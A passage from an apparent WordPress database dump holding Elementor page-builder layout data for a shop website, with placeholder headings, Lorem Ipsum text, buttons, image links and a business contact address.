here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8166,1442,'_elementor_page_assets','a:0:{}'),(8169,1443,'_elementor_edit_mode','builder'),(8170,1443,'_elementor_template_type','wp-page'),(8171,1443,'_elementor_version','3.7.7'),(8172,1443,'_wp_page_template','elementor_canvas'),(8173,1443,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8174,1443,'_elementor_page_assets','a:0:{}'),(8176,1444,'_elementor_edit_mode','builder'),(8177,1444,'_elementor_template_type','wp-page'),(8178,1444,'_elementor_version','3.7.7'),(8179,1444,'_wp_page_template','elementor_canvas'),(8180,1444,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 